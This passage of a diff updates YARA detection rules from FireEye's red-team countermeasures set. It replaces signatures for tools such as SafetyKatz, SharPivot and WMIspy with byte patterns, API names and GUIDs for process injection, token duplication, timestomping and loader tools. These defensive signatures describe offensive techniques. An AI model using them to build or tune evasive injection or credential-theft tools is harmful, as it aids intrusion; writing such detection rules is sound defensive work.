+		$dump = { C7 [2-5] FD 03 00 AC 4C 8D 4D ?? 41 B8 1F 00 10 00 8B [2-5] 48 8B 4D ?? E8 [4] 89 [2-5] 83 [2-5] 00 74 ?? 48 8B 4D ?? FF 15 [4] 33 C0 E9 [4] 41 B8 10 00 00 00 33 D2 48 8D 8D [4] E8 [4] 48 8D 05 [4] 48 89 85 [4] 48 C7 85 [8] 48 C7 44 24 30 00 00 00 00 C7 44 24 28 80 00 00 00 C7 44 24 20 01 00 00 00 45 33 C9 45 33 C0 BA 00 00 00 10 48 8D 0D [4] FF 15 [4] 48 89 85 [4] 48 83 BD [4] FF 75 ?? 48 8B 4D ?? FF 15 [4] 33 C0 EB [0-17] 48 8D [5] 48 89 ?? 24 30 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 41 B9 02 00 00 00 4C 8B 85 [4] 8B [1-5] 48 8B 4D ?? E8 }
+		$enable_dbg_pri = { 4C 8D 45 ?? 48 8D 15 [4] 33 C9 FF 15 [4] 85 C0 0F 84 [4] C7 45 ?? 01 00 00 00 B8 0C 00 00 00 48 6B C0 00 48 8B 4D ?? 48 89 4C 05 ?? B8 0C 00 00 00 48 6B C0 00 C7 44 05 ?? 02 00 00 00 FF 15 [4] 4C 8D 45 ?? BA 20 00 00 00 48 8B C8 FF 15 [4] 85 C0 74 ?? 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 45 33 C9 4C 8D 45 ?? 33 D2 48 8B 4D ?? FF 15 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_3 : FILE
+rule FIREEYE_RT_Trojan_Win64_Generic_22 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "42e4e777-6d51-5733-97df-dc27f13a27b7"
-		date = "2020-12-18"
-		modified = "2020-12-18"
+		id = "e79661a8-5254-5e8e-b92b-edf1ddb072ff"
+		date = "2020-11-26"
+		date = "2020-11-26"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_3.yar#L5-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/supplemental/yara/Trojan_Win64_Generic_22.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		logic_hash = "41cc6a4c7765b1e5e88d12660b69e434c83938ca974b9ccf6545b4dd5dd78378"
+		hash = "f7d9961463b5110a3d70ee2e97842ed3"
+		logic_hash = "52fbe5c0ee7c05df5fcd62c26caaa5498e32352da9c5940e522aa31d6c808028"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		rev = 2
 
 	strings:
-		$create_thread_injected = { 7E [2] 00 0A 0A 16 0B 16 8D [2] 00 01 0C 28 [2] 00 06 2? ?? 2A 28 [2] 00 0A 1E 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 7E [2] 00 0A 08 8E 69 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 0D 09 7E [2] 00 0A 28 [2] 00 0A }
-		$iz1 = /_Cor(Exe|Dll)Main/ fullword
-		$rc4 = { 20 00 01 00 00 8D [2] 00 01 1? ?? 20 00 01 00 00 8D [2] 00 01 1? ?? 03 8E 69 8D [2] 00 01 1? ?? 16 0B 2B ?? 1? ?? 07 02 07 02 8E 69 5D 91 9E 1? ?? 07 07 9E 07 17 58 0B 07 20 00 01 00 00 32 }
-		$suspended_process = { 12 ?? FE 15 [2] 00 02 1? ?? FE 15 [2] 00 02 02 14 7E [2] 00 0A 7E [2] 00 0A 16 20 [2] 00 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 }
+		$api1 = "VirtualAllocEx" fullword
+		$api2 = "UpdateProcThreadAttribute" fullword
+		$api3 = "DuplicateTokenEx" fullword
+		$api4 = "CreateProcessAsUserA" fullword
+		$inject = { C7 44 24 20 40 00 00 00 33 D2 41 B9 00 30 00 00 41 B8 [4] 48 8B CB FF 15 [4] 48 8B F0 48 85 C0 74 ?? 4C 89 74 24 20 41 B9 [4] 4C 8D 05 [4] 48 8B D6 48 8B CB FF 15 [4] 85 C0 75 [5-10] 4C 8D 0C 3E 48 8D 44 24 ?? 48 89 44 24 30 44 89 74 24 28 4C 89 74 24 20 33 D2 41 B8 [4] 48 8B CB FF 15 }
+		$process = { 89 74 24 30 ?? 8D 4C 24 [2] 89 74 24 28 33 D2 41 B8 00 00 02 00 48 C7 44 24 20 08 00 00 00 48 8B CF FF 15 [4] 85 C0 0F 84 [4] 48 8B [2-3] 48 8D 45 ?? 48 89 44 24 50 4C 8D 05 [4] 48 8D 45 ?? 48 89 7D 08 48 89 44 24 48 45 33 C9 ?? 89 74 24 40 33 D2 ?? 89 74 24 38 C7 44 24 30 04 00 08 00 [0-1] 89 74 24 28 ?? 89 74 24 20 FF 15 }
+		$token = { FF 15 [4] 4C 8D 44 24 ?? BA 0A 00 00 00 48 8B C8 FF 15 [4] 85 C0 0F 84 [4] 48 8B 4C 24 ?? 48 8D [2-3] 41 B9 02 00 00 00 48 89 44 24 28 45 33 C0 C7 44 24 20 02 00 00 00 41 8D 51 09 FF 15 [4] 85 C0 0F 84 [4] 45 33 C0 4C 8D 4C 24 ?? 33 C9 41 8D 50 01 FF 15 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_1 : FILE
+rule FIREEYE_RT_Trojan_Win64_Generic_23 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "d438575f-3cb2-5cff-b5d4-733044f62e61"
-		date = "2020-12-18"
-		modified = "2020-12-18"
+		id = "470bfeed-e000-58c6-b115-dfa8aea25bef"
+		date = "2020-12-02"
+		date = "2020-12-02"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_1.yar#L5-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/supplemental/yara/Trojan_Win64_Generic_23.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		logic_hash = "56237d686b954950849adeedc87d5f9fbff2335a0ff033ba8571b3e3b93f587c"
+		hash = "b66347ef110e60b064474ae746701d4a"
+		logic_hash = "4c1860801b26abbab8c4aea730bf69f388c902083b9945e11e6782af3ab22789"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		rev = 1
 
 	strings:
-		$create_thread_injected = { 7E [2] 00 0A 0A 16 0B 16 8D [2] 00 01 0C 28 [2] 00 06 2? ?? 2A 28 [2] 00 0A 1E 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 7E [2] 00 0A 08 8E 69 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 0D 09 7E [2] 00 0A 28 [2] 00 0A }
-		$iz1 = /_Cor(Exe|Dll)Main/ fullword
-		$suspended_process = { 12 ?? FE 15 [2] 00 02 1? ?? FE 15 [2] 00 02 02 14 7E [2] 00 0A 7E [2] 00 0A 16 20 [2] 00 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 }
+		$api1 = "VirtualAllocEx" fullword
+		$api2 = "UpdateProcThreadAttribute" fullword
+		$api3 = "DuplicateTokenEx" fullword
+		$api4 = "CreateProcessAsUserA" fullword
+		$inject = { 8B 85 [4] C7 44 24 20 40 00 00 00 41 B9 00 30 00 00 44 8B C0 33 D2 48 8B 8D [4] FF 15 [4] 48 89 45 ?? 48 83 7D ?? 00 75 ?? 48 8B 45 ?? E9 [4] 8B 85 [4] 48 C7 44 24 20 00 00 00 00 44 8B C8 4C 8B 85 [4] 48 8B 55 ?? 48 8B 8D [4] FF 15 [4] 85 C0 75 ?? 48 8B 45 ?? EB ?? 8B 85 [4] 48 8B 4D ?? 48 03 C8 48 8B C1 48 89 45 48 48 8D 85 [4] 48 89 44 24 30 C7 44 24 28 00 00 00 00 48 8B 85 [4] 48 89 44 24 20 4C 8B 4D ?? 41 B8 00 00 10 00 33 D2 48 8B 8D [4] FF 15 }
+		$process = { 48 C7 44 24 30 00 00 00 00 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 08 00 00 00 4C 8D 8D [4] 41 B8 00 00 02 00 33 D2 48 8B 8D [4] FF 15 [4] 85 C0 75 ?? E9 [4] 48 8B 85 [4] 48 89 85 [4] 48 8D 85 [4] 48 89 44 24 50 48 8D 85 [4] 48 89 44 24 48 48 C7 44 24 40 00 00 00 00 48 C7 44 24 38 00 00 00 00 C7 44 24 30 04 00 08 00 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 45 33 C9 4C 8D 05 [4] 33 D2 48 8B [2-5] FF 15 }
+		$token = { FF 15 [4] 4C 8D 45 ?? BA 0A 00 00 00 48 8B C8 FF 15 [4] 85 C0 75 ?? E9 [4] 48 8D [2-5] 48 89 44 24 28 C7 44 24 20 02 00 00 00 41 B9 02 00 00 00 45 33 C0 BA 0B 00 00 00 48 8B 4D ?? FF 15 [4] 85 C0 75 ?? E9 [4] 4C 8D 8D [4] 45 33 C0 BA 01 00 00 00 33 C9 FF 15 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_HOLSTER_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_GPOHUNT_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the a customized version of the 'DUEDLLIGENCE' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'gpohunt' project."
 		author = "FireEye"
-		id = "e1e8979e-2dee-5061-a11d-00dcfba476c3"
+		id = "e4325f11-103c-5893-8978-9a72f7ca6105"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/HackTool_MSIL_HOLSTER_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/GPOHUNT/production/yara/APT_HackTool_MSIL_GPOHUNT_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "a91bf61cc18705be2288a0f6f125068f"
-		logic_hash = "bc254a1ab71f2a6092f139ce5a85347a7a4976f963603ffbbebb9b0d6ce6573c"
-		score = 75
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "4b1f175dac123a6340494e2730d66c718478fb7618dc5611315992ed33e0f6c7"
+		score = 50
 		quality = 73
 		tags = "FILE"
-		rev = 2
+		rev = 3
 
 	strings:
-		$typelibguid1 = "a8bdbba4-7291-49d1-9a1b-372de45a9d88" ascii nocase wide
+		$typelibguid0 = "751a9270-2de0-4c81-9e29-872cd6378303" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_SAFETYKATZ_4 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Corehound_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SafetyKatz project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CoreHound' project."
 		author = "FireEye"
-		id = "e160b75d-cc39-5e16-86e1-cba9fe64a6b6"
+		id = "8c914b34-3e3d-53ae-a5e4-9dbfdff45a24"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SAFETYKATZ/production/yara/HackTool_MSIL_SAFETYKATZ_4.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/COREHOUND/production/yara/HackTool_MSIL_CoreHound_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "45736deb14f3a68e88b038183c23e597"
-		logic_hash = "a02b4acea691d485f427ed26487f2f601065901324a8dcd6cd8de9502d8cd897"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "b0f759709428d5c9404507a13259bf85cb8c405d38b807539098f7cc871023d8"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$typelibguid1 = "8347E81B-89FC-42A9-B22C-F59A6A572DEC" ascii nocase wide
+		$typelibguid0 = "1fff2aee-a540-4613-94ee-4f208b30c599" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Loader_MSIL_Allthethings_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Wmisharp_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'AllTheThings' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMISharp' project."
 		author = "FireEye"
-		id = "1805b406-2531-56bf-8e08-e63a59ffcc84"
+		id = "97b9d057-30d3-5af7-bac6-4dd53f47650f"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ALLTHETHINGS/production/yara/Loader_MSIL_AllTheThings_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISHARP/production/yara/HackTool_MSIL_WMISharp_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "e3058095f2a49f8c0f78cb392024795367609b04c1da80210ab8d72c6613ee71"
+		logic_hash = "d119d52c1410291d582696d5c4c1de3db9008db963c76a9e344959d869c3acc0"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$typelibguid0 = "542ccc64-c4c3-4c03-abcd-199a11b26754" ascii nocase wide
+		$typelibguid0 = "3a2421d9-c1aa-4fff-ad76-7fcb48ed4bff" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_WMISPY_2 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSTOMP_2 : FILE
 {
 	meta:
-		description = "wql searches"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "474af878-a657-54bc-a063-04532df928d4"
-		date = "2020-12-08"
+		id = "d1a3477d-55c6-5c33-bd65-5b1e0d65f24b"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISPY/production/yara/APT_HackTool_MSIL_WMISPY_2.yar#L4-L24"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/APT_HackTool_MSIL_SHARPSTOMP_2.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "3651f252d53d2f46040652788499d65a"
-		logic_hash = "553fc1e536482a56b3228a5c9ebac843af9083e8ac864bf65c81b36a39ca5e5e"
+		hash = "83ed748cd94576700268d35666bf3e01"
+		logic_hash = "4ed1553f12c607792d7d4e7026ecb36231cd417a06eba8b2925c2c643436b5fe"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 4
+		rev = 3
 
 	strings:
-		$MSIL = "_CorExeMain"
-		$str1 = "root\\cimv2" wide
-		$str2 = "root\\standardcimv2" wide
-		$str3 = "from MSFT_NetNeighbor" wide
-		$str4 = "from Win32_NetworkLoginProfile" wide
-		$str5 = "from Win32_IP4RouteTable" wide
-		$str6 = "from Win32_DCOMApplication" wide
-		$str7 = "from Win32_SystemDriver" wide
-		$str8 = "from Win32_Share" wide
-		$str9 = "from Win32_Process" wide
+		$f0 = "mscoree.dll" fullword nocase
+		$s0 = { 06 72 [4] 6F [4] 2C ?? 06 72 [4] 6F [4] 2D ?? 72 [4] 28 [4] 28 [4] 2A }
+		$s1 = { 02 28 [4] 0A 02 28 [4] 0B 02 28 [4] 0C 72 [4] 28 [4] 72 }
+		$s2 = { 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 72 }
+		$s3 = "SetCreationTime" fullword
+		$s4 = "GetLastAccessTime" fullword
+		$s5 = "SetLastAccessTime" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and $MSIL and all of ( $str* )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Wmispy_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharpstomp_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMIspy' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharpStomp project."
 		author = "FireEye"
-		id = "ac394751-da40-564b-8e24-8f353326b46a"
+		id = "e113c221-fabe-5af4-b763-463c4f86288d"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISPY/production/yara/HackTool_MSIL_WMIspy_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/HackTool_MSIL_SharpStomp_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "a5a9f7c7a7bfe474e8b21306ea220b4d476832f3ad4fafdd8967a2250d15a701"
+		hash = "83ed748cd94576700268d35666bf3e01"
+		logic_hash = "fd0a3d046734d48be74d9a74f27570468550d21911c54ca82c81a1d64e9fdd17"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 4
 
 	strings:
-		$typelibguid0 = "5ee2bca3-01ad-489b-ab1b-bda7962e06bb" ascii nocase wide
+		$typelibguid1 = "41f35e79-2034-496a-8c82-86443164ada2" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_2 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSTOMP_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "8d6d28ce-de3a-5a38-b654-ba1372d47568"
-		date = "2020-12-08"
+		id = "4b4a54c8-9717-5fbb-8130-a49162bc6b07"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_2.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/APT_HackTool_MSIL_SHARPSTOMP_1.yar#L4-L24"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e4efa759d425e2f26fbc29943a30f5bd"
-		logic_hash = "14e4a29a32e8441a6f7f322e09cd9bb9822ae47eaa1fdf8e09c90998b03658f5"
+		hash = "83ed748cd94576700268d35666bf3e01"
+		logic_hash = "af8aa0e87d8b6623a908fde5014f3849cd0ca20d5926c798be82ce4eab2668bb"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
 		rev = 3
 
 	strings:
-		$s1 = "costura"
-		$s2 = "cmd_schtask" wide
-		$s3 = "cmd_wmi" wide
-		$s4 = "cmd_rpc" wide
-		$s5 = "GoogleUpdateTaskMachineUA" wide
-		$s6 = "servicehijack" wide
-		$s7 = "poisonhandler" wide
+		$s0 = "mscoree.dll" fullword nocase
+		$s1 = "timestompfile" fullword nocase
+		$s2 = "sharpstomp" fullword nocase
+		$s3 = "GetLastWriteTime" fullword
+		$s4 = "SetLastWriteTime" fullword
+		$s5 = "GetCreationTime" fullword
+		$s6 = "SetCreationTime" fullword
+		$s7 = "GetLastAccessTime" fullword
+		$s8 = "SetLastAccessTime" fullword
 
 	condition:
 		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_3 : FILE
+rule FIREEYE_RT_Loader_MSIL_RURALBISHOP_1 : FILE
 {
 	meta:
-		description = "This rule looks for .NET PE files that have the strings of various method names in the SharPivot code."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "616333fc-4075-5f04-823a-1164717a2b87"
-		date = "2020-12-08"
-		modified = "2020-12-10"
+		id = "1b5f1f39-9fa2-5940-8da3-03808e4b7a5d"
+		date = "2020-12-03"
+		date = "2020-12-03"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_3.yar#L4-L31"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/new/yara/Loader_MSIL_RURALBISHOP_1.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e4efa759d425e2f26fbc29943a30f5bd"
-		logic_hash = "ecf13e47e409efd68b508735a84be6a1627f5b0c0cea6b90434fc9ba5b1d8cf5"
+		hash = "e91670423930cbbd3dbf5eac1f1a7cb6"
+		logic_hash = "f2244c6761639c1162a77a5e82296903c3cc21fbf46d262c779c5e4d6a2ef937"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$msil = "_CorExeMain" ascii wide
-		$str1 = "SharPivot" ascii wide
-		$str2 = "ParseArgs" ascii wide
-		$str3 = "GenRandomString" ascii wide
-		$str4 = "ScheduledTaskExists" ascii wide
-		$str5 = "ServiceExists" ascii wide
-		$str6 = "lpPassword" ascii wide
-		$str7 = "execute" ascii wide
-		$str8 = "WinRM" ascii wide
-		$str9 = "SchtaskMod" ascii wide
-		$str10 = "PoisonHandler" ascii wide
-		$str11 = "SCShell" ascii wide
-		$str12 = "SchtaskMod" ascii wide
-		$str13 = "ServiceHijack" ascii wide
-		$str14 = "commandArg" ascii wide
-		$str15 = "payloadPath" ascii wide
-		$str16 = "Schtask" ascii wide
+		$sb1 = { 28 [2] 00 06 0A 06 7B [2] 00 04 [12-64] 06 7B [2] 00 04 6E 28 [2] 00 06 0B 07 7B [2] 00 04 [12-64] 0? 7B [2] 00 04 0? 7B [2] 00 04 0? 7B [2] 00 04 6E 28 [2] 00 06 0? 0? 7B [2] 00 04 [12-80] 0? 7B [2] 00 04 1? 0? 7B [2] 00 04 }
+		$sb2 = { 0F ?? 7C [2] 00 04 28 [2] 00 0A 8C [2] 00 01 [20-80] 28 [2] 00 06 0? 0? 7E [2] 00 0A 28 [2] 00 0A [12-80] 7E [2] 00 0A 13 ?? 0? 7B [2] 00 04 28 [2] 00 0A 0? 28 [2] 00 0A 58 28 [2] 00 0A 13 [1-32] 28 [2] 00 0A [0-32] D0 [2] 00 02 28 [2] 00 0A 28 [2] 00 0A 74 [2] 00 02 }
+		$ss1 = "\x00NtMapViewOfSection\x00"
+		$ss2 = "\x00NtOpenProcess\x00"
+		$ss3 = "\x00NtAlertResumeThread\x00"
+		$ss4 = "\x00LdrGetProcedureAddress\x00"
+		$tb1 = "\x00SharpSploit.Execution.DynamicInvoke\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( @sb1 [ 1 ] < @sb2 [ 1 ] ) and ( all of ( $ss* ) ) and ( all of ( $tb* ) )
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_4 : FILE
+rule FIREEYE_RT_Loader_MSIL_RURALBISHOP_2 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharPivot project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "c1bd64da-6a54-5bc6-8a89-9c8a93dd965c"
-		date = "2020-12-08"
+		id = "3befb3f2-81d1-5db2-84d9-773158b9837c"
+		date = "2020-12-03"
+		date = "2020-12-03"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_4.yar#L4-L15"
